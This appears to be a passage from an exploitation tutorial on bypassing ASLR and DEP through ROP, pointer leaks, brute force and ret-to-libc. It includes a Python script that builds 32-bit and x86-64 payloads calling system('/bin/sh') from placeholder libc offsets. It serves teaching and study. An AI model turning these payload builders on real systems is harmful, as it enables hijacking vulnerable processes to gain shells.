How to do it...

We need to first evade ASLR. There are basically three ways in which ASLR can be bypassed:

  1. Look for a module that was built without ASLR support (no PIE on Linux, no DYNAMICBASE on Windows) being loaded into the process. That module's base address, and therefore every gadget and import inside it, is at a fixed location. From here, we can use the Return Oriented Programming (ROP) approach: we reuse small snippets of existing code, each ending in a return instruction, and chain them through return addresses placed on the stack to get the desired result:

[Figure: a ROP chain built from gadgets.] Source: https://www.slideshare.net/dataera/remix-ondemand-live-randomization-finegrained-live-aslr-during-runtime
  2. We get a pointer leak/memory leak (a format string bug, an over-read, uninitialized memory) and subtract the known offset of the leaked symbol from the leaked address to recover the base address of the module it lives in. Every other function or string in that module is then base plus its offset. A quick sanity check is that the computed base must be page-aligned; if it is not, the offsets belong to a different build of the library.
  3. On 32-bit systems the address space is comparatively small, so there are far fewer bits available for randomization (only 8 bits by default for the mmap base on 32-bit Linux, against 28 bits on x86-64). This makes the range of randomization small enough for brute force, especially against forking servers, where each child inherits the parent's layout and a crash does not re-randomize it.

To bypass NX/DEP once we know addresses, we use the well-known ret-to-libc attack (return into an existing function such as system() with a controlled argument) or a ROP chain (for example, to call mprotect() on Linux or VirtualProtect() on Windows and then jump to our shellcode). Both methods work on either platform; the point is that we execute code that is already mapped executable instead of injecting our own, so the tasks we would have done with shellcode are performed by libc functions or by chained gadgets.

This is pretty much the basic concept behind bypassing ASLR and DEP. There are many more advanced ways of writing exploits, and as mitigations are patched and hardened, new methods are discovered to bypass them.
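As an added example, not code from the book, the script below shows the exploit-side arithmetic behind steps 2 and 3 and the DEP bypass: turning a leaked pointer into a module base (with the page-alignment sanity check), building a ret-to-libc frame for 32-bit and a ROP chain for x86-64 from that base, and estimating the cost of brute-forcing the remaining entropy. All symbol and gadget offsets in HYPOTHETICAL_LIBC, the leaked address, and the padding sizes are constructed values; on a real target you would read them from the victim's library and from the crash offset.

```python
import struct

# Constructed, HYPOTHETICAL symbol offsets standing in for a target libc.
# On a real target you read them from the victim's library, e.g.
#   readelf -s libc.so.6 | grep -E ' (puts|system)@'
#   strings -t x libc.so.6 | grep /bin/sh
# None of these numbers correspond to a real build.
HYPOTHETICAL_LIBC = {
    "puts":        0x080ed0,
    "system":      0x050d60,
    "/bin/sh":     0x1b45bd,
    "pop_rdi_ret": 0x02a3e5,   # 5f c3  (x86-64 gadget, hypothetical)
    "ret":         0x02a3e6,   # c3     (alignment gadget, hypothetical)
}
PAGE = 0x1000


def plausible_base(base):
    """ELF/PE mappings are page-aligned; a misaligned base means the offset
    table does not match the target's library (wrong version or build)."""
    return base > 0 and (base & (PAGE - 1)) == 0


def module_base_from_leak(leaked_ptr, symbol, offsets=HYPOTHETICAL_LIBC):
    """Step 2 of the recipe: leaked address minus the symbol's known offset
    gives the base of the module the pointer lives in."""
    base = leaked_ptr - offsets[symbol]
    if not plausible_base(base):
        raise ValueError(f"{symbol} leak {leaked_ptr:#x} gives misaligned base {base:#x}")
    return base


def resolve(base, symbol, offsets=HYPOTHETICAL_LIBC):
    """Every other symbol in the module is base + offset once base is known."""
    return base + offsets[symbol]


def ret2libc_x86(base, padding, offsets=HYPOTHETICAL_LIBC):
    """32-bit ret-to-libc: cdecl passes arguments on the stack, so the frame
    after the overflow is [system][fake return address][&"/bin/sh"]."""
    fake_ret = 0xDEADBEEF  # where system() would return; a crash there is fine
    chain = struct.pack("<III",
                        resolve(base, "system", offsets),
                        fake_ret,
                        resolve(base, "/bin/sh", offsets))
    return b"A" * padding + chain


def ret2libc_x86_64(base, padding, offsets=HYPOTHETICAL_LIBC):
    """x86-64: the first argument travels in RDI, so a gadget is needed.
    Chain: ret (re-aligns RSP to 16 bytes for system()'s SSE code)
           -> pop rdi; ret -> &"/bin/sh" -> system."""
    chain = [resolve(base, "ret", offsets),
             resolve(base, "pop_rdi_ret", offsets),
             resolve(base, "/bin/sh", offsets),
             resolve(base, "system", offsets)]
    return b"A" * padding + b"".join(struct.pack("<Q", a) for a in chain)


def bruteforce_cost(entropy_bits, layout_fixed):
    """Step 3: average number of guesses for one fixed candidate address.
    layout_fixed=True models a forking server whose children inherit the
    parent's layout: each wrong guess is ruled out, average (2**bits + 1) / 2,
    worst case 2**bits.
    layout_fixed=False models a target re-randomized on every attempt:
    guesses are independent draws, average 2**bits, no hard upper bound."""
    space = 1 << entropy_bits
    return (space + 1) / 2 if layout_fixed else float(space)


if __name__ == "__main__":
    # Constructed leak: pretend the target printed puts's GOT entry.
    leaked_puts = 0x7FFFF7E80ED0
    base = module_base_from_leak(leaked_puts, "puts")
    print(f"libc base {base:#x}, system() at {resolve(base, 'system'):#x}")
    print("x86-64 payload:", ret2libc_x86_64(base, padding=40).hex())
    print(f"8-bit mmap entropy, forking server: ~{bruteforce_cost(8, True):.0f} tries")
    print(f"28-bit mmap entropy (x86-64 default): ~{bruteforce_cost(28, False):.0f} tries")
```

The alignment check in module_base_from_leak is the cheapest way to catch a mismatched libc before spending attempts on a chain that can never work, and the two payload builders make the calling-convention difference explicit: on 32-bit the argument sits on the stack, on x86-64 it has to be popped into RDI by a gadget first.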
